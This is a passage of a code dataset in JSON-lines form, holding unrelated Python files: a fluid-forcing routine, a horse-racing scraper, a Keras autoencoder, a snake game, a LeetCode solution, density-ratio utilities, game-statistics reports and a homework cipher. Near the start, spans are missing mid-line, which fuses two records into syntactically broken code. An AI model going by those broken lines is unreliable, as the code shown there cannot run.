v1\n\tF3_nd = np.zeros((N,Nx));\t# h1\n\tF6_nd = np.zeros((N,Nx));\t# h2\n\n\t#=======================================================\n\n\tif FORCE1 == 'BALANCED':\n\t\tmass = 0;\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr = np.sqrt(x[i]**2 + (y[j]-y0)**2);\n\t\t\t\tif r < r0:\t\n\t\t\t\t\tcount = count + 1;\n\t\t\t\t\tif r == 0:\n\t\t\t\t\t\tF1[j,i] = 0;\n\t\t\t\t\t\tF2[j,i] = 0;\n\t\t\t\t\telse:\n\t\t\t\t\t\tF1[j,i] = AmpF * np.pi * g * (y[j]-y0) / (2 * r0 * f[j] * r) * np.sin((np.pi / 2) * r / r0);\n\t\t\t\t\t\tF2[j,i] = - AmpF * np.pi * g * x[i] / (2 * r0 * f[j] * r) * np.sin((np.pi / 2) * r / r0);\n\t\t\t\t\tF3[j,i] = AmpF * np.cos((np.pi / 2) * r / r0) / rho2_nd;\n\t\t\t\t\tmass = mass + F3[j,i];\n\t\tmass = mass / (N*(Nx) - count);\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr = np.sqrt(x[i]**2 + (y[j]-y0)**2);\n\t\t\t\tif r >= r0:\n\t\t\t\t\tF3[j,i] = - mass;\n\t\t#F3x = diff(F3,1,1,dx);\n\t\t#F3y = diff(F3,0,0,dy);\n\t\t#for j in range(0,N):\n\t\t#\tF1[j,:] = - g * F3y[j,:] / f[j];\n\t\t#\tF2[j,:] = g * F3x[j,:] / f[j];\n\n\tF6 = - rho1_nd * F3\n\n\t#=======================================================\n\t\t\t\n\t# Buoyancy only.\n\tif FORCE1 == 'BUOYANCY':\n\t\tcount = 0;\n\t\tmass = 0;\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr = np.sqrt(x[i]**2 + (y[j]-y0)**2);\n\t\t\t\tif r= r0:\n\t\t\t\t\tF3[j,i] = - mass;\n\t\t\n\t#=======================================================\n\n\t# Vorticity only.\n\tif FORCE1 == 'VORTICITY':\n\t\tfor i in range(0,N+1):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr = np.sqrt(x[i]**2 + (y[j]-y0)**2);\n\t\t\t\tif r div > div.performance > table > tbody > tr')\n for row in rows:\n cells = row.css('td') \n \n yield {\n 'place': cells[0].css('td').css('::text').extract_first(),\n 'horse_no': cells[1].css('td').css('::text').extract_first(),\n 'horse_id': re.search('HorseId=([\\w\\d]+)', cells[2].css('td').css('a::attr(href)').extract_first())[1],\n 'jockey_id': re.search('JockeyId=([\\w\\d]+)', cells[3].css('td').css('a::attr(href)').extract_first())[1],\n 'trainer_id': re.search('TrainerId=([\\w\\d]+)', cells[4].css('td').css('a::attr(href)').extract_first())[1],\n 'actual_weight': cells[5].css('td').css('::text').extract_first(),\n 'declared_horse_weight': cells[6].css('td').css('::text').extract_first(),\n 'draw': cells[7].css('td').css('::text').extract_first(),\n 'lbw': cells[8].css('td').css('::text').extract_first(),\n 'running_position': [re.sub(r'[\\r\\n ]+', '', c) for c in cells[9].css('td').css('div > div::text').extract()],\n 'finish_time': cells[10].css('td').css('::text').extract_first(),\n 'win_odds': cells[11].css('td').css('::text').extract_first(),\n }\n\nimport json\n\nclass JsonWriterPipeline(object):\n\n def open_spider(self, spider):\n self.file = open('quoteresult.jl', 'w')\n\n def close_spider(self, spider):\n self.file.close()\n\n def process_item(self, item, spider):\n line = json.dumps(dict(item)) + \"\\n\"\n self.file.write(line)\n return item\n\n\nfrom pprint import pprint\n\nclass StdoutWriterPipeline(object):\n\n def open_spider(self, spider):\n pass\n\n def close_spider(self, spider):\n pass\n\n def process_item(self, item, spider):\n pprint(item)\n return item\n","sub_path":"RaceResultSpider.py","file_name":"RaceResultSpider.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"628662770","text":"\nimport numpy as np\nfrom tensorflow.python.keras.layers import *\nfrom tensorflow.python.keras.models import Model, Sequential\n\ndef model_fn(shape=(32,32,1), nblocks=5, base_dim=4, nstack_layer=3) :\n \"\"\"\n Reference: https://blog.keras.io/building-autoencoders-in-keras.html\n base_dim: 4\n nblocks : 5\n nstack_layer: 3. Number of conv layer / block\n \"\"\"\n def convSeries_fn(x,\n filters=16, \n kernel_size=3, \n nstack_layer=3, \n stride=2, \n init_filter=16,\n channels=6,\n up=True, \n pooling=True\n ):\n \"\"\"\n INPUT\n nstack_layer : number of iteration of conv layer before batch_norm. default 3.\n up : boolean. True is encoder, False is decoder(conv2D transpose)\n \"\"\"\n for idx in range(nstack_layer):\n if up:\n if idx == 0:\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding='same',\n strides=stride,\n kernel_initializer='he_normal')(x)\n x = LeakyReLU()(x)\n elif idx == nstack_layer - 1:\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding='same',\n kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n else:\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding='same',\n kernel_initializer='he_normal')(x)\n x = LeakyReLU()(x)\n else:\n if idx == nstack_layer-1:\n x = Conv2DTranspose(filters=int(filters/2), kernel_size=kernel_size, \n strides=(stride,stride), padding='same')(x)\n x = BatchNormalization()(x)\n else:\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding='same',\n kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n \n return x\n\n # set params\n init_filters = 2**(base_dim) \n params = {\n 'filters': [ 2**(i+base_dim+1) for i in range(nblocks-1)],\n 'kernel_size': 3\n } # remainded n-1 blocks\n channels = shape[-1]\n\n ## start construction\n x = inp = Input(shape=shape, name='encoding_input')\n #----------------------------------------------------------------------------------------------\n # encoder layers\n #----------------------------------------------------------------------------------------------\n ## first block with same size\n # keep the first layer size\n for _ilayer in range(nstack_layer): \n x = Conv2D(filters=init_filters, kernel_size=3, padding='same', kernel_initializer='he_normal')(x)\n if _ilayer == nstack_layer - 1:\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n # encoder layers\n for iblock in range(nblocks-1):\n filters = params[\"filters\"][iblock]\n kernel_size = params[\"kernel_size\"]\n if iblock != nblocks-1:\n x = convSeries_fn(x,filters=filters, kernel_size=kernel_size, nstack_layer=nstack_layer, up=True)\n \n # build model for encoder + digit layer\n encoder = Model(inp, x, name='encoder')\n \n x = inp = Input(x.shape[1:], name=\"decoder_input\")\n #----------------------------------------------------------------------------------------------\n # decoder layers\n #----------------------------------------------------------------------------------------------\n x = Conv2D(filters=params[\"filters\"][-1], kernel_size=3, padding='same', kernel_initializer='he_normal')(x)\n x = LeakyReLU()(x)\n for iblock in range(nblocks-1):\n filters = params[\"filters\"][::-1][iblock]\n kernel_size = params[\"kernel_size\"]\n x = convSeries_fn(x,filters=filters, kernel_size=kernel_size,\n nstack_layer=nstack_layer, init_filter=params['filters'][0],channels=channels, up=False)\n\n # final block\n for _ilayer in range(nstack_layer-1): \n x = Conv2D(filters=init_filters, kernel_size=3, padding='same', kernel_initializer='he_normal')(x)\n if _ilayer == nstack_layer - 1:\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n # final layer\n x = Conv2D(filters=channels, kernel_size=3, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n \n decoder = Model(inp, x, name='decoder')\n \n return encoder, decoder\n\n","sub_path":"active_codes/models_update.py","file_name":"models_update.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"533051398","text":"import pygame\n\nfrom plateau import Plateau\nfrom constante import Constante\n\n########## class ##########\n\nclass Game:\n\n @classmethod\n def emitEvent(self, name):\n event = pygame.event.Event(name)\n pygame.event.post(event)\n\n def __init__(self, row=10, column=10):\n self.plateau = Plateau(row, column)\n self.last_direction = Constante.DOWN\n self.score = 0\n self.nb_step = 0\n self.nb_step_max_by_score = (row + column) * 4\n \n def init(self):\n self.last_direction = Constante.DOWN\n self.score = 0\n self.nb_step = 0\n self.plateau.init()\n \n def move(self, direction):\n if Constante.OPPOSIT_ACTION[self.last_direction] == direction:\n return False\n self.last_direction = direction\n coderetour = self.plateau.move(direction)\n if (coderetour == Plateau.RET_MOVE_NORMAL):\n self.nb_step += 1\n if (self.nb_step > (self.nb_step_max_by_score * (self.score + 1))):\n self.emitEvent(Constante.EVENT_TOO_MUCH_STEP)\n if (coderetour == Plateau.RET_MOVE_EAT_WALL):\n self.emitEvent(Constante.EVENT_EAT_WALL)\n if (coderetour == Plateau.RET_MOVE_EAT_VERTABRATE):\n self.emitEvent(Constante.EVENT_EAT_VERTEBRATE)\n if (coderetour == Plateau.RET_MOVE_EAT_APPLE):\n self.score += 1\n self.emitEvent(Constante.EVENT_EAT_APPLE)\n return coderetour\n\n ########## action des buttons ##########\n def increase_nb_step(self):\n self.nb_step_max_by_score = self.nb_step_max_by_score - 1\n\n def decrease_nb_step(self):\n self.nb_step_max_by_score = self.nb_step_max_by_score + 1\n \n def kill(self):\n self.emitEvent(Constante.EVENT_KILL)\n\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"288757088","text":"import unittest\n\n\ndef findLexSmallestString(self, s: str, a: int, b: int) -> str:\n queue = [s]\n ans = s\n seen = set()\n while queue:\n size = len(queue)\n for i in range(size):\n current = queue.pop()\n ans = min(current, ans)\n rotate = current[b:] + current[:b]\n if rotate not in seen:\n seen.add(rotate)\n queue.append(rotate)\n t = transform(current, a)\n if t not in seen:\n seen.add(t)\n queue.append(t)\n return ans\n\n\ndef transform(s: str, delta: int):\n ans = ''\n for i, c in enumerate(s):\n if i % 2 == 1:\n ans += str((int(c) + delta) % 10)\n else:\n ans += c\n return ans\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n self.assertEqual('2050', findLexSmallestString(self, '5525', 5, 2))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"1625.py","file_name":"1625.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"491152256","text":"import warnings\nwarnings.filterwarnings('ignore')\nimport tensorflow as tf\nimport numpy as np\nimport seaborn as sns; \nimport tensorflow_probability as tfp\ntfd = tfp.distributions\nfrom scipy.stats import norm, uniform, cauchy\nimport sys\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nslim = tf.contrib.slim\nfrom tqdm.notebook import tqdm\nfrom time import sleep\nfrom IPython.display import display, clear_output\nimport pickle\nimport os\nfrom scipy.linalg import cholesky\nimport math\n\n\n\n\ntol = 1e-35\nbs = 500\nK = 3\ndo = 0.8\n\n\ndef reset(seed=40):\n tf.reset_default_graph()\n tf.random.set_random_seed(seed)\n \n\ndef ratios_critic(x, prob = 1, K=3, deep=False):\n with tf.variable_scope('critic', reuse=tf.AUTO_REUSE) as scope:\n \n q1 = tf.get_variable('q1',1.)\n q2 = tf.get_variable('q2',1.)\n q3 = tf.get_variable('q3',1.)\n \n q4 = tf.get_variable('q4',1.)\n q5 = tf.get_variable('q5',1.)\n q6 = tf.get_variable('q6',1.)\n \n b1 = tf.get_variable('b1',1.)\n b2 = tf.get_variable('b2',1.)\n b3 = tf.get_variable('b3',1.)\n \n s1 = tf.get_variable('s1',1.)\n s2 = tf.get_variable('s2',1.)\n s3 = tf.get_variable('s3',1.)\n \n t1 = tf.get_variable('t1',1.)\n t2 = tf.get_variable('t2',1.)\n t3 = tf.get_variable('t3',1.)\n\n# h1 = 1e12*(x-q1)*(x-q1)*s1 + (x-q4)*t1 + b1 \n h1 = (x-q1)*(x-q1)*s1 + (x-q4)*t1 + b1 \n h2 = (x-q2)*(x-q2)*s2 + (x-q5)*t2 + b2\n h3 = t3*(x-q6) + b3# t3*(x-q6) + b3 #(x-q3)*(x-q3)*s3 + t3*(x-q6) + b3\n# h3 = slim.fully_connected(tf.concat([h1,h2],1), 1, activation_fn=tf.nn.softplus)\n# h3 = slim.fully_connected(h3, 1, activation_fn=None)\n \n \n# h1 = tf.matmul(x,tf.matmul(q1,q1,transpose_b=True))\n# h1 = tf.reduce_sum(x*h1,-1, keep_dims=True) + b1\n \n# h2 = tf.matmul(x,tf.matmul(q2,q2,transpose_b=True))\n# h2 = tf.reduce_sum(x*h2,-1, keep_dims=True) + b2\n \n# h3 = tf.matmul(x,tf.matmul(q3,q3,transpose_b=True))\n# h3 = tf.reduce_sum(x*h3,-1, keep_dims=True) + b3\n \n logits = tf.concat([h1,h2,h3],1)\n \n return logits\n \n# def ratios_critic(x, prob = 1, K=3, deep=False):\n# with tf.variable_scope('critic', reuse=tf.AUTO_REUSE) as scope:\n \n# h = slim.fully_connected(x, 100, activation_fn=tf.nn.softplus)\n# h = tf.nn.dropout(h,prob)\n \n# h = slim.fully_connected(h, 50, activation_fn=tf.nn.softplus)\n# h = tf.nn.dropout(h,prob)\n \n# return slim.fully_connected(h, K, activation_fn=None, biases_initializer = tf.constant_initializer(0))\n\n\n# def get_data(mu_1=0.,mu_2=2.,mu_3=2.,scale_p=0.1,scale_q=0.1,scale_m=1.,mtype='cauchy'):\n# p = tfd.Normal(loc=mu_1, scale=scale_p)\n# q = tfd.Normal(loc=mu_2, scale=scale_q) #tfp.distributions.StudentT(df=1., loc=mu_2, scale=scale_q)#t\n# if mtype=='cauchy':\n# m = tfp.distributions.Cauchy(loc=mu_3, scale=scale_m)\n# if mtype=='cauchy_mix':\n# mix = 0.3\n# m = tfp.distributions.Mixture(\n# cat=tfp.distributions.Categorical(probs=[.6,.4]),\n# components=[\n# p,\n# q\n# ])\n# elif mtype=='student':\n# m = tfp.distributions.StudentT(df=1., loc=mu_3, scale=scale_m)\n# else:\n# m = tfp.distributions.Normal(loc=mu_3, scale=scale_m)\n \n# p_samples = p.sample([bs]) \n# q_samples = q.sample([bs])\n# alpha = tfd.Uniform (0.,1.).sample([bs])\n# m_samples = m.sample([bs]) #tf.sqrt(1-alpha*alpha)*p_samples + alpha*q_samples + m.sample([bs])\n \n# return p, q, m, p_samples, q_samples, m_samples, m\n\n\ndef get_gt_ratio_kl(p,q,samples):\n ratio = p.log_prob(samples) - q.log_prob(samples)\n kl = tf.reduce_mean(ratio)\n try:\n true_kl = p.kl_divergence(q)\n except:\n true_kl = \"-1\"\n \n return ratio, kl, true_kl\n\ndef get_logits(samples, do=1., deep=False, training=True):\n samples = tf.expand_dims(samples,1)\n return ratios_critic(samples, do, deep=deep)\n\ndef get_kl_from_cob(samples):\n log_rat = get_logits(samples)\n return tf.reduce_mean(log_rat[:,0]-log_rat[:,1])\n\ndef get_loss(p_samples,q_samples,m_samples, m_dist=None,do=0.8, deep=False):\n \n logP = get_logits(p_samples, do, deep=deep)\n logQ = get_logits(q_samples, do, deep=deep)\n logM = get_logits(m_samples, do, deep=deep)\n \n a = np.tile([1,0,0],bs)\n b = np.tile([0,1,0],bs)\n c = np.tile([0,0,1],bs)\n\n label_a = tf.reshape(a,[bs,K])\n label_b = tf.reshape(b,[bs,K])\n label_c = tf.reshape(c,[bs,K])\n\n disc_loss_1 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logP, labels=label_a))\n disc_loss_2 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logQ, labels=label_b))\n disc_loss_3 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logM, labels=label_c))\n \n loss = disc_loss_1 + disc_loss_2 + disc_loss_3\n \n if m_dist != None:\n loss += 1e-5*tf.reduce_mean(m_dist.log_prob(m_samples) - logM[:,2])\n return loss\n\ndef get_optim(loss, lr=0.001, b1=0.001, b2=0.999):\n t_vars = tf.trainable_variables()\n c_vars = [var for var in t_vars if 'critic' in var.name]\n# optim = tf.train.AdamOptimizer(learning_rate=lr, beta1=b1, beta2=b2).minimize(loss, var_list=t_vars)\n optim = tf.train.AdamOptimizer(lr).minimize(loss, var_list=t_vars)\n return optim\n\n\ndef train(sess, loss, optim, plotlosses, N=30000):\n\n pbar = range(0,N)\n for i in pbar:\n \n feed_dict = {}\n l,_ = sess.run([loss, optim],feed_dict=feed_dict)\n\n if i%1000==0:\n plotlosses.update({\n 'Loss': l,\n })\n plotlosses.send()\n\n \n \ndef sample_and_plot(sess, kld, kl_from_pq, kl_from_cob, p_samples, q_samples, m_samples, log_ratio_p_q, log_ratio_p_m, mu_1, mu_2, scale_p, scale_q, mu_3, scale_m):\n kl_ratio_store=[]\n log_ratio_store=[]\n log_r_p_from_m_direct_store=[]\n\n\n feed_dict = {}\n kl_true, kl_cob, p_s, q_s, m_s, lpq, lpq_from_cob_dre_direct = sess.run([kl_from_pq, kl_from_cob, p_samples, q_samples, m_samples,\n log_ratio_p_q, log_ratio_p_m],\n feed_dict=feed_dict)\n \n \n \n '''Save ratio estimates'''\n data_dir = \"../data/sym/\"+str(scale_p)+\"-\"+str(scale_q)+str(scale_m)+\"/\"\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n \n# f = open(data_dir+\"KLD\"+\".txt\", \"a\")\n# f.write(\"GT for mu_3 = \"+str(mu_3)+\": \"+str(kl_ratio)+\"\\nGT-est: \"+str(kl_true)+\"\\nCoB: \"+str(kl_cob)+\"\\n----------\\n\")\n# f.close()\n log_ratio_store.append(lpq)\n log_r_p_from_m_direct_store.append(lpq_from_cob_dre_direct)\n \n pickle.dump(log_r_p_from_m_direct_store, open(data_dir+\"log_r_p_from_m_direct_store\"+str(mu_3)+\".p\", \"wb\"))\n pickle.dump(m_s, open(data_dir+\"xs\"+str(mu_3)+\".p\", \"wb\"))\n# pickle.dump(log_ratio_store, open(data_dir+\"log_ratio_store\"+str(mu_3)+\".p\", \"wb\"))\n \n xs = m_s\n\n fig, [ax1,ax2,ax3, ax4] = plt.subplots(1, 4,figsize=(13,4))\n ax1.hist(p_s, density=True, histtype='stepfilled', alpha=0.8, label='P')\n ax1.hist(q_s, density=True, histtype='stepfilled', alpha=0.8, label='Q')\n ax1.hist(m_s, density=True, histtype='stepfilled', alpha=0.8, label='M')\n ax1.legend(loc='best', frameon=False)\n ax1.set_xlim([-5,5])\n \n ax2.scatter(xs,log_ratio_store[0],label='True p/q',alpha=0.9,s=10.,c='b')\n ax2.scatter(xs,log_r_p_from_m_direct_store[-1][:,0]-log_r_p_from_m_direct_store[-1][:,1],label='CoB p/q',alpha=0.9,s=10.,c='r')\n ax2.scatter(xs,-log_ratio_store[0],label='True q/p',alpha=0.9,s=10.,c='b')\n ax2.scatter(xs,log_r_p_from_m_direct_store[-1][:,1]-log_r_p_from_m_direct_store[-1][:,0],label='CoB q/p',alpha=0.9,s=10.,c='r')\n\n ax2.set_xlabel(\"Samples\")\n ax2.set_ylabel(\"Log Ratio\")\n ax2.legend(loc='best')\n ax2.set_xlim([-6,10])\n ax2.set_ylim([-1000,1000])\n \n pm = [np.squeeze(norm.logpdf(x,mu_1,scale_p)-cauchy.logpdf(x,mu_3,scale_m)) for x in xs]\n qm = [np.squeeze(norm.logpdf(x,mu_2,scale_q)-cauchy.logpdf(x,mu_3,scale_m)) for x in xs]\n ax4.scatter(xs,pm,label='True p/m',alpha=0.9,s=10.,c='b')\n ax4.scatter(xs,log_r_p_from_m_direct_store[-1][:,0]-log_r_p_from_m_direct_store[-1][:,2],label='CoB p/m',alpha=0.9,s=10.,c='r')\n ax4.scatter(xs,qm,label='True q/m',alpha=0.9,s=10.,c='y')\n ax4.scatter(xs,log_r_p_from_m_direct_store[-1][:,1]-log_r_p_from_m_direct_store[-1][:,2],label='CoB q/m',alpha=0.9,s=10.,c='g')\n\n ax4.set_xlabel(\"Samples\")\n ax4.set_ylabel(\"Log Ratio\")\n ax4.legend(loc='best')\n ax4.set_xlim([-6,10])\n ax4.set_ylim([-1000,1000])\n \n \n rat = log_r_p_from_m_direct_store[-1][:,0]-log_r_p_from_m_direct_store[-1][:,1]\n d = [np.squeeze(norm.logpdf(x,mu_2,scale_q)) for x in xs]\n b = [np.squeeze(norm.logpdf(x,mu_1,scale_p)) for x in xs]\n ax3.scatter(xs,b,label='True P',alpha=0.9,s=5.)\n ax3.scatter(xs,rat+d,label='P',alpha=0.9,s=5.)\n\n ax3.set_xlabel(\"Samples\")\n ax3.set_ylabel(\"Log P(x)\")\n ax3.legend(loc='best')\n ax3.set_xlim([-6,10])\n ax3.set_ylim([-600,400])\n \n# plt.savefig(data_dir+str(mu_3)+\".jpg\")\n \n \n ","sub_path":"models/ratio_utils.py","file_name":"ratio_utils.py","file_ext":"py","file_size_in_byte":9389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"207807792","text":"import csv\n\n# basic import: nested lists\ndef import_data(filename):\n imported_data = []\n with open(filename) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n return imported_data\n\n\ndef count_games(filename):\n imported_data = []\n with open(filename) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n return len(imported_data) # there are as many nested lists (items) as games\n\n\ndef decide(file_name, year=None):\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n years = []\n for item in range(len(imported_data)):\n years.append(imported_data[item][2])\n if year is not None:\n if str(year) in years:\n return True\n else:\n return False\n else:\n return \"No year entered.\"\n\n\ndef get_latest(file_name):\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n years = []\n for item in range(len(imported_data)):\n years.append(imported_data[item][2])\n latest_game = max(years)\n latest_title = str(imported_data[years.index(latest_game)][0])\n return latest_title\n\n\ndef count_by_genre(file_name, genre=None):\n # import data as nested lists\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n# make a list of genres\n genres = []\n for item in range(len(imported_data)):\n genres.append(imported_data[item][3])\n genres = list(set(genres)) # so every genre appears only once\n if genre is not None:\n if genre in genres:\n occurrence = 0\n for game in range(len(imported_data)):\n if str(genre) in imported_data[game][3]: # checks every nested list (=game),\n # and if the 4rd element, which is the genre, is the same as the one in the function call,\n # the count is increased\n occurrence += 1\n return occurrence\n else:\n return \"No such genre.\"\n else: # when no genre is given\n return \"No genre entered.\"\n\n\ndef get_line_number_by_title(file_name, title=None):\n # import data as nested lists\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n try:\n if title is not None: # when something is given as title in the function call\n for item in range(len(imported_data)):\n if title == imported_data[item][0]: # when it is found in the file\n line_number = int(item) + 1 # int(item) is just the index of the game, line number needs to start from 1, instead of 0\n return line_number\n # else: # when it is not found in the file\n # raise ValueError\n else: # when nothing is given as title in the function call\n raise ValueError\n except ValueError: # when no title is given/found\n return \"No such title.\"\n\n\ndef sort_abc(file_name):\n # import data as nested lists\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n titles = []\n for item in imported_data:\n titles.append(item[0]) # append the 0th element of every nested list, which is the title\n titles = sorted(titles)\n return titles\n\n\n# alternative sorting\ndef sort_abc_alg(file_name):\n # import data as nested lists\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n unsorted_titles = []\n sorted_titles = []\n for item in imported_data:\n unsorted_titles.append(item[0])\n while unsorted_titles:\n minimum = unsorted_titles[0] # it uses the very first element as minimum\n for t in unsorted_titles:\n if t < minimum: # checks every other element, whether they are smaller\n minimum = t\n sorted_titles.append(minimum) # if they are smaller, they get appended to the sorted list\n unsorted_titles.remove(minimum)\n return sorted_titles # titles are in alphabetical order appended to this list\n\n\n\ndef get_genres(file_name):\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n genres = []\n for item in range(len(imported_data)): # check all games\n genres.append(imported_data[item][3]) # append the genre\n genres = sorted(list(set(genres)), key=str.lower) # unique genres in alphabetical order, regardless of their case (uppercase is higher alphabetical order than lower)\n return genres\n\n\ndef when_was_top_sold_fps(file_name):\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n try:\n fps_games = []\n for item in range(len(imported_data)): # checking every game's genre\n if imported_data[item][3] == \"First-person shooter\": # every fps is appended\n fps_games.append(imported_data[item])\n copies_sold = []\n for item in fps_games:\n copies_sold.append(float(item[1])) # creating a list of the amount sold\n top_sold = max(copies_sold) # this is the highest\n for t in range(len(fps_games)):\n if str(top_sold) in fps_games[t]: # if the highest number is found in that game's list, it's release is what we are looking for\n release_of_top_sold_game = fps_games[t][2]\n return int(release_of_top_sold_game)\n except ValueError:\n return 'No such game with genre \"First-person shooter\".'\n\n\n# count_games(\"game_stat.txt\")\n# decide(\"game_stat.txt\")\n# get_latest(\"game_stat.txt\")\n# count_by_genre(\"game_stat.txt\")\n# get_line_number_by_title(\"game_stat.txt\")\n# sort_abc(\"game_stat.txt\")\n# sort_abc_alg(\"game_stat.txt\")\n# get_genres(\"game_stat.txt\")\n# when_was_top_sold_fps(\"game_stat.txt\")\n#\n# def call_all(file_name):\n# count_games(file_name)\n# decide(file_name)\n# get_latest(file_name)\n# count_by_genre(file_name)\n# get_line_number_by_title(file_name)\n# sort_abc(file_name)\n# sort_abc_alg(file_name)\n# get_genres(file_name)\n# when_was_top_sold_fps(file_name)\n#\n# call_all(\"game_stat.txt\")\n","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"456487631","text":"\n'''Dato un testo da codificare ed una chiave si propone il seguente schema crittografico:\n\n- dalla chiave vengono eliminati tutti i caratteri C per cui C<'a' o C>'z'. \n- di ciascuno dei caratteri restanti vengono cancellate dalla chiave tutte le occorrenze \n tranne l'ultima, ottenendo una sequenza DISORDINATA. \n- i caratteri presenti nella stringa cosi' ripulita saranno i soli caratteri del testo \n ad essere codificati ovvero sostituiti nel testo crittografato (gli altri resteranno invariati). \n- la sequenza ORDINATA dei caratteri rimasti nella chiave viene messa in corrispondenza \n con la sequenza DISORDINATA dei caratteri ottenuti al passo precedente.\n\nCome esempio di applicazione consideriamo la chiave\n \"sim sala Bim!\"\na seguito delle eliminazioni la chiave produce la sequenza DISORDINATA\n \"slaim\"\n \nI soli caratteri del testo a subire una codifica sarano 's','l', 'a' 'i' ed 'm'. \nPer sapere con cosa verranno codificati questi caratteri si considera la seguente corrispondenza\ntra sequenze:\n \"ailms\" (sequenza ordinata degli stessi caratteri)\n \"slaim\" (sequenza disordinata ottenuta dalla chiave)\nquesto determina gli accoppiamenti (a,s), (i,l) (l,a), (m,i) ed (s,m)\nla 'a' dunque sara' codificata con 's', la 'i' con 'l' e cosi' via.\n\nUtilizzando la chiave \"sim sala Bim!\" per codificare il testo \"il mare sa di sale\" si \n otterra' il seguente testo crittografato:\n \"il mare sa di sale\" (testo in chiaro)\n \"la isre ms dl msae\" (testo crittografato)\n\nLa decodifica del testo crittografato opera sulla stessa chive ma sostituisce le lettere\npresenti nella sequenza disordinata con quelle della sequenza ordinata.\nQuindi nell'esempio precedente le sostituzioni sono invertite:\n (s, a), (l, i) (a, l), (i, m) ed (m, s)\n\nPer altri esempi vedere il file grade03.txt\n\nImplementate le due funzioni\n codifica(chiave, testo_in_chiaro) -> testo_crittografato\n decodifica(chiave, testo_crittografato) -> testo_in_chiaro\n\nATTENZIONE: NON USATE LETTERE ACCENTATE.\nATTENZIONE: Se il grader non termina entro 30 secondi il punteggio dell'esercizio e' zero.\n'''\n\ndef keyGen(strKey):\n lsBase=list(strKey)\n newlsBase=lsBase.copy() #copia della lista da usare nel for\n D=set() #Insieme usato per stanziare i char\n for i in range(len(lsBase)-1,-1,-1):\n #if il carattere non è dentro D ed è un carattere valido\n charr=lsBase[i]\n if charr not in D and (charr >= 'a' and charr <= 'z'): \n D.add(charr)\n else:\n del lsBase[i]\n #Genero chiave codifica e decodifica nel type utile\n LsEnd=sorted(lsBase)\n txtBase=''.join(lsBase)\n txtEnd=''.join(LsEnd)\n return (txtBase,txtEnd)\n\ndef Trasform(lTesto,ls1,ls2):\n for i in range(len(lTesto)):\n x = lTesto[i]\n y = ls1.find(x) \n if y != -1:\n lTesto[i] = ls2[y]\n return lTesto\n\ndef codifica(chiave, testo):\n '''inserire qui la vostra implementazione'''\n lsb,lse=keyGen(chiave)\n lsTesto=list(testo) #trasformo in lista perchè str immutabile\n return ''.join(Trasform(lsTesto,lse,lsb))\n\n\ndef decodifica(chiave, testo):\n '''inserire qui la vostra implementazione'''\n lsb,lse=keyGen(chiave)\n lsTesto=list(testo)\n return ''.join(Trasform(lsTesto,lsb,lse))","sub_path":"students/1792394/homework01/program03.py","file_name":"program03.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"437360451","text":"import os\nimport tkFont\nimport ttk\nimport Menu as 